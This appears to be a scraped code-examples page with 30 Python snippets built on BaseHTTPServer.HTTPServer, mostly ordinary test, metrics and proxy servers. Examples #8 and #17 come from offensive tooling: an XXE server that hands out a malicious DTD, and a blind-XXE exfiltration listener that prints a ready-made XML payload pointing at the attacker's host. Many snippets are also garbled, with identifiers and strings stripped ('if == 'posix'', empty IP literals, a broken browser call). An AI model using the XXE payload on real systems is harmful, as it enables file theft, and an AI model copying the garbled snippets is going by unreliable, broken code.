Python BaseHTTPServer.HTTPServer() Examples
The following are 30
code examples of BaseHTTPServer.HTTPServer().
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Example #1
Source File: From Computable with MIT License | 7 votes |
def call(self, input): """ Simple implementation to serve the build directory. """ try: dirname, filename = os.path.split(input) if dirname: os.chdir(dirname) httpd = HTTPServer(('', 8000), SimpleHTTPRequestHandler) sa = httpd.socket.getsockname() url = "http://" + sa[0] + ":" + str(sa[1]) + "/" + filename if self.open_in_browser:, new=2) print("Serving your slides on " + url) print("Use Control-C to stop this server.") httpd.serve_forever() except KeyboardInterrupt: print("The server is shut down.")
Example #2
Source File: From integrations-extras with BSD 3-Clause "New" or "Revised" License | 7 votes |
def __init__(self): super(HttpServerThread, self).__init__() self.done = False self.hostname = 'localhost' class MockStardog(BaseHTTPRequestHandler): def do_GET(self): if self.path != '/admin/status': self.send_response(404) return self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() # json.dumps always outputs a str, wfile.write requires bytes self.wfile.write(ensure_bytes(json.dumps(DATA))) self.http = HTTPServer((self.hostname, 0), MockStardog) self.port = self.http.server_port
Example #3
Source File: From with MIT License | 6 votes |
def do_POST(self): #J parse_identifier(self) #K if self.path != '/statuses/filter.json': #L return self.send_error(404) #L process_filters(self) #M # <end id="streaming-http-server"/> #A Create a new class called 'StreamingAPIServer' #B This new class should have the ability to create new threads with each request, and should be a HTTPServer #C Tell the internals of the threading server to shut down all client request threads if the main server thread dies #D Create a new class called 'StreamingAPIRequestHandler' #E This new class should be able to handle HTTP requests #F Create a method that is called do_GET(), which will be executed on GET requests performed against this server #G Call a helper function that handles the fetching of an identifier for the client #H If the request is not a 'sample' or 'firehose' streaming GET request, return a '404 not found' error #I Otherwise, call a helper function that actually handles the filtering #J Create a method that is called do_POST(), which will be executed on POST requests performed against this server #K Call a helper function that handles the fetching of an identifier for the client #L If the request is not a user, keyword, or location filter, return a '404 not found' error #M Otherwise, call a helper function that actually handles the filtering #END # <start id="get-identifier"/>
Example #4
Source File: From django-prometheus with Apache License 2.0 | 6 votes |
def SetupPrometheusEndpointOnPort(port, addr=""): """Exports Prometheus metrics on an HTTPServer running in its own thread. The server runs on the given port and is by default listenning on all interfaces. This HTTPServer is fully independent of Django and its stack. This offers the advantage that even if Django becomes unable to respond, the HTTPServer will continue to function and export metrics. However, this also means that the features offered by Django (like middlewares or WSGI) can't be used. Now here's the really weird part. When Django runs with the auto-reloader enabled (which is the default, you can disable it with ` runserver --noreload`), it forks and executes twice. That's wasteful but usually OK. It starts being a problem when you try to open a port, like we do. We can detect that we're running under an autoreloader through the presence of the RUN_MAIN environment variable, so we abort if we're trying to export under an autoreloader and trying to open a port. """ assert os.environ.get("RUN_MAIN") != "true", ( "The thread-based exporter can't be safely used when django's " "autoreloader is active. Use the URL exporter, or start django " "with --noreload. See documentation/" ) prometheus_client.start_http_server(port, addr=addr)
Example #5
Source File: From p2ptv-pi with MIT License | 6 votes |
def __init__(self, port): if VideoHTTPServer.__single: raise RuntimeError, 'HTTPServer is Singleton' VideoHTTPServer.__single = self self.port = port if globalConfig.get_value('allow-non-local-client-connection'): bind_address = '' else: bind_address = '' BaseHTTPServer.HTTPServer.__init__(self, (bind_address, self.port), SimpleServer) self.daemon_threads = True self.allow_reuse_address = True self.lock = RLock() self.urlpath2streaminfo = {} self.mappers = [] self.errorcallback = None self.statuscallback = None self.ic = None self.load_torr = None self.url_is_set = 0
Example #6
Source File: From avocado-vt with GNU General Public License v2.0 | 6 votes |
def http_server(port=8000, cwd=None, terminate_callable=None): http = HTTPServer(('', port), HTTPRequestHandler) http.timeout = 1 if cwd is None: cwd = os.getcwd() http.cwd = cwd while True: if terminate_callable is not None: terminate = terminate_callable() else: terminate = False if terminate: break http.handle_request()
Example #7
Source File: From pykit with MIT License | 6 votes |
def setUp(self): self.addr = ('', 22038) self.proxy_addr = ('', 22039) self.response['http-status'] = 200 def _start_http_svr(): self.http_server = HTTPServer(self.addr, HttpHandle) self.http_server.serve_forever() def _start_proxy_http_svr(): self.proxy_http_server = HTTPServer(self.proxy_addr, HttpHandle) self.proxy_http_server.serve_forever() threadutil.start_daemon_thread(_start_http_svr) threadutil.start_daemon_thread(_start_proxy_http_svr) time.sleep(0.1) self.cli = redisutil.RedisProxyClient([self.addr]) self.n = self.cli.n self.w = self.cli.w self.r = self.cli.r
Example #8
Source File: From xxetimes with GNU General Public License v3.0 | 6 votes |
def startServer(ip, port=8000, isb64=False): try: DTD_CONTENTS = DTD_TEMPLATE.format(ip, port) xxeHandler = makeCustomHandlerClass(DTD_NAME, DTD_CONTENTS, isb64) server = HTTPServer((ip, port), xxeHandler) #touches a file to let the other process know the server is running. super hacky with open('.server_started','w') as check: check.write('true') print '\n[+] started server on {}:{}'.format(ip,port) print '\n[+] Request away. Happy hunting.' print '[+] press Ctrl-C to close\n' server.serve_forever() except KeyboardInterrupt: print "\n...shutting down" if os.path.exists('.server_started'): os.remove('.server_started') server.socket.close()
Example #9
Source File: From SUBZero with MIT License | 6 votes |
def run(HandlerClass=SimpleHTTPRequestHandler, ServerClass=BaseHTTPServer.HTTPServer, protocol="HTTP/1.0"): if sys.argv[1:]: port = int(sys.argv[1]) else: port = 443 server_address = ('', port) HandlerClass.protocol_version = protocol httpd = ServerClass(server_address, HandlerClass) sa = httpd.socket.getsockname() print "Serving HTTP on", sa[0], "port", sa[1], "..." httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever()
Example #10
Source File: From BinderFilter with MIT License | 6 votes |
def test_get(self): #constructs the path relative to the root directory of the HTTPServer response = self.request(self.tempdir_name + '/test') self.check_status_and_reason(response, 200, response = self.request(self.tempdir_name + '/') self.check_status_and_reason(response, 200) response = self.request(self.tempdir_name) self.check_status_and_reason(response, 301) response = self.request('/ThisDoesNotExist') self.check_status_and_reason(response, 404) response = self.request('/' + 'ThisDoesNotExist' + '/') self.check_status_and_reason(response, 404) f = open(os.path.join(self.tempdir_name, 'index.html'), 'w') response = self.request('/' + self.tempdir_name + '/') self.check_status_and_reason(response, 200) # chmod() doesn't work as expected on Windows, and filesystem # permissions are ignored by root on Unix. if == 'posix' and os.geteuid() != 0: os.chmod(self.tempdir, 0) response = self.request(self.tempdir_name + '/') self.check_status_and_reason(response, 404) os.chmod(self.tempdir, 0755)
Example #11
Source File: From oss-ftp with MIT License | 6 votes |
def test_get(self): #constructs the path relative to the root directory of the HTTPServer response = self.request(self.tempdir_name + '/test') self.check_status_and_reason(response, 200, # check for trailing "/" which should return 404. See Issue17324 response = self.request(self.tempdir_name + '/test/') self.check_status_and_reason(response, 404) response = self.request(self.tempdir_name + '/') self.check_status_and_reason(response, 200) response = self.request(self.tempdir_name) self.check_status_and_reason(response, 301) response = self.request('/ThisDoesNotExist') self.check_status_and_reason(response, 404) response = self.request('/' + 'ThisDoesNotExist' + '/') self.check_status_and_reason(response, 404) with open(os.path.join(self.tempdir_name, 'index.html'), 'w') as fp: response = self.request('/' + self.tempdir_name + '/') self.check_status_and_reason(response, 200) # chmod() doesn't work as expected on Windows, and filesystem # permissions are ignored by root on Unix. if == 'posix' and os.geteuid() != 0: os.chmod(self.tempdir, 0) response = self.request(self.tempdir_name + '/') self.check_status_and_reason(response, 404) os.chmod(self.tempdir, 0755)
Example #12
Source File: From sparrest with MIT License | 6 votes |
def run_on(ip, port): """ Starts the HTTP server in the given port :param port: port to run the http server :return: void """ print("Starting a server on port {0}. Use CNTRL+C to stop the server.".format(port)) server_address = (ip, port) try: httpd = HTTPServer(server_address, SparrestHandler) httpd.serve_forever() except OSError as e: if e.errno == 48: # port already in use print("ERROR: The port {0} is already used by another process.".format(port)) else: raise OSError except KeyboardInterrupt as interrupt: print("Server stopped. Bye bye!")
Example #13
Source File: From code with MIT License | 5 votes |
def test(HandlerClass = googleCacheHandler, ServerClass = BaseHTTPServer.HTTPServer): BaseHTTPServer.test(HandlerClass, ServerClass)
Example #14
Source File: From Offensive-Security-Certified-Professional with MIT License | 5 votes |
def run(server_class=HTTPServer, handler_class=S, port=80): server_address = ('', port) httpd = server_class(server_address, handler_class) print 'Starting httpd...' httpd.serve_forever()
Example #15
Source File: From code with MIT License | 5 votes |
def server_bind(self): BaseHTTPServer.HTTPServer.server_bind(self) self.socket.settimeout(1) = True
Example #16
Source File: From Logstash with GNU General Public License v3.0 | 5 votes |
def __init__(self, *args,**kwargs): self.fc = FreqCounter() self.cache = {} self.cache_lock = threading.Lock() self.screen_lock = threading.Lock() self.alexa = "" self.verbose = False self.fc_lock = threading.Lock() self.dirty_fc = False self.exitthread = threading.Event() self.exitthread.clear() BaseHTTPServer.HTTPServer.__init__(self, *args, **kwargs)
Example #17
Source File: From Offensive-Security-Certified-Professional with MIT License | 5 votes |
def main(argv): global config fetchRhost() opts = parseOptions(argv) if not opts: Logger.err('Options parsing failed.') return False print('[+] Serving HTTP server on: ("{}", {})'.format( config['listen'], config['port'] )) dbg('RHOST set to: {}'.format(config['rhost'])) rhost = config['listen'] if config['listen'] == '': rhost = config['rhost'] print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:') print(''' === <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://{}:{}/test.dtd"> <foo>&exfil;</foo> === PS: Don't forget to set: Content-Type: text/xml '''.format(rhost, config['port'])) server = HTTPServer((config['listen'], config['port']), BlindXXEServer) thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start() while not EXFILTRATED_EVENT.is_set(): pass print('[+] File has been exfiltrated. Quitting.')
Example #18
Source File: From deploymentmanager-samples with Apache License 2.0 | 5 votes |
def main(): # Process flags port = 12345 cert_file = '' key_file = '' try: opts, _ = getopt.getopt( sys.argv[1:], '', ['port=', 'cert_file=', 'key_file=']) except getopt.GetoptError: logging.error( ' ' '--port <port> --cert_file <cert_file> --key_file <key_file>') sys.exit(2) for opt, arg in opts: if opt == '--port': port = int(arg) elif opt == '--cert_file': cert_file = arg elif opt == '--key_file': key_file = arg # Start server healthz_server = BaseHTTPServer.HTTPServer(('', port), HealthzHandler) print 'Started healthz_server on port', port if cert_file and key_file: healthz_server.socket = ssl.wrap_socket( healthz_server.socket, certfile=cert_file, keyfile=key_file, server_side=True) healthz_server.serve_forever()
Example #19
Source File: From networking with GNU General Public License v3.0 | 5 votes |
def main(args): try: port = int(args[1]) except IndexError: port = 8000 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("",80)) ip = s.getsockname()[0] except: ip = "" print "No Connection" try: CNCopyCurrentNetworkInfo = c.CNCopyCurrentNetworkInfo CNCopyCurrentNetworkInfo.restype = c_void_p CNCopyCurrentNetworkInfo.argtypes = [c_void_p] wifiid = ObjCInstance(CNCopyCurrentNetworkInfo(ns('en0'))) wifiid = wifiid["SSID"] except: wifiid = "[Your WiFi]" server_address = (ip, port) print "Started Proxy",ip,port print "\nTo Start Logging:" print "Settings>WiFi>%s>HTTP Proxy>Manual>\nHost: %s\nPort: %s\nAuthentication: OFF\n" %(wifiid,ip,port) httpd = BaseHTTPServer.HTTPServer(server_address, LoggingProxyHTTPHandler) httpd.serve_forever()
Example #20
Source File: From pytest-vcr with MIT License | 5 votes |
def __init__(self): self.server = HTTPServer(('', 0), TestHTTPHandler) self.thread = Thread(None, self.server.serve_forever) self.thread.daemon = True self.thread.start()
Example #21
Source File: From PySyncObj with MIT License | 5 votes |
def main(): if len(sys.argv) < 5: print('Usage: %s http_port dump_file.bin selfHost:port partner1Host:port partner2Host:port ...' % sys.argv[0]) sys.exit(-1) httpPort = int(sys.argv[1]) dumpFile = sys.argv[2] selfAddr = sys.argv[3] partners = sys.argv[4:] global _g_kvstorage _g_kvstorage = KVStorage(selfAddr, partners, dumpFile) httpServer = HTTPServer(('', httpPort), KVRequestHandler) httpServer.serve_forever()
Example #22
Source File: From python-publisher with Apache License 2.0 | 5 votes |
def setUp(self): global REQUESTS REQUESTS = 0 self.server = BaseHTTPServer.HTTPServer(('', 0), RequestHandler) t = threading.Thread(target=self.server.serve_forever) t.setDaemon(True) t.start() self.hub = 'http://%s:%d' % ( self.server.server_name, self.server.server_port) self.feed = '' self.feed2 = '' self.feed3 = ''
Example #23
Source File: From gimme-aws-creds with Apache License 2.0 | 5 votes |
def duo_webserver(self): """HTTP webserver.""" httpd = HTTPServer(self.socket, self.handler_with_html) httpd.serve_forever()
Example #24
Source File: From inference-model-manager with Apache License 2.0 | 5 votes |
def run_server(port, auth_url): class Server(BaseHTTPRequestHandler): def log_message(self, format, *args): return def _set_headers(self): self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() def do_GET(self): self._set_headers() query = urlparse(self.path).query parsed_query = parse_qs(query) if 'code' in parsed_query: print("A request was received with an authorization code.") global code code = parsed_query['code'][0] self.prepare_response() self.kill_server() def prepare_response(self): python_ver = sys.version_info.major if python_ver == 3: self.wfile.write(bytes(html_page, 'UTF-8')) else: self.wfile.write(html_page) def kill_server(self): assassin = threading.Thread(target=httpd.shutdown) assassin.daemon = True assassin.start() handler_class = Server server_address = ('', port) httpd = HTTPServer(server_address, handler_class) open_webbrowser(auth_url) print('Waiting for authorization code.') httpd.serve_forever()
Example #25
Source File: From googleapps-message-recall with Apache License 2.0 | 5 votes |
def run(flow, storage): """Core code for a command-line application. Args: flow: Flow, an OAuth 1.0 Flow to step through. storage: Storage, a Storage to store the credential in. Returns: Credentials, the obtained credential. Exceptions: RequestError: if step2 of the flow fails. Args: """ if FLAGS.auth_local_webserver: success = False port_number = 0 for port in FLAGS.auth_host_port: port_number = port try: httpd = BaseHTTPServer.HTTPServer((FLAGS.auth_host_name, port), ClientRedirectHandler) except socket.error, e: pass else: success = True break FLAGS.auth_local_webserver = success
Example #26
Source File: From dlnap with MIT License | 5 votes |
def runProxy(ip = '', port = 8000): global running running = True DownloadProxy.protocol_version = "HTTP/1.0" httpd = HTTPServer((ip, port), DownloadProxy) while running: httpd.handle_request() # # PROXY # =================================================================================================
Example #27
Source File: From p2ptv-pi with MIT License | 5 votes |
def __init__(self, port): if MultiHTTPServer.__single: raise RuntimeError, 'MultiHTTPServer is Singleton' MultiHTTPServer.__single = self self.port = port BaseHTTPServer.HTTPServer.__init__(self, ('', self.port), SimpleServer) self.daemon_threads = True self.allow_reuse_address = True self.lock = RLock() self.urlpath2streaminfo = {} self.mappers = [] self.errorcallback = None self.statuscallback = None
Example #28
Source File: From CoAPthon with MIT License | 5 votes |
def run(self): """ Start the proxy. """ server_address = (self.ip, self.hc_port) hc_proxy = HTTPServer(server_address, HCProxyHandler)'Starting HTTP-CoAP Proxy...') hc_proxy.serve_forever() # the server listen to http://ip:hc_port/path
Example #29
Source File: From trafficserver_exporter with Apache License 2.0 | 5 votes |
def start_http_server(port, addr=""): """Starts a HTTP server for prometheus metrics as a daemon thread.""" class PrometheusMetricsServer(threading.Thread): def run(self): httpd = HTTPServer((addr, port), MetricsHandler) httpd.serve_forever() t = PrometheusMetricsServer() t.daemon = True t.start() return t
Example #30
Source File: From extract_recipe with Apache License 2.0 | 5 votes |
def start_server(): """Start the server.""" server_address = ("", PORT) server = BaseHTTPServer.HTTPServer(server_address, TestHandler) server.serve_forever()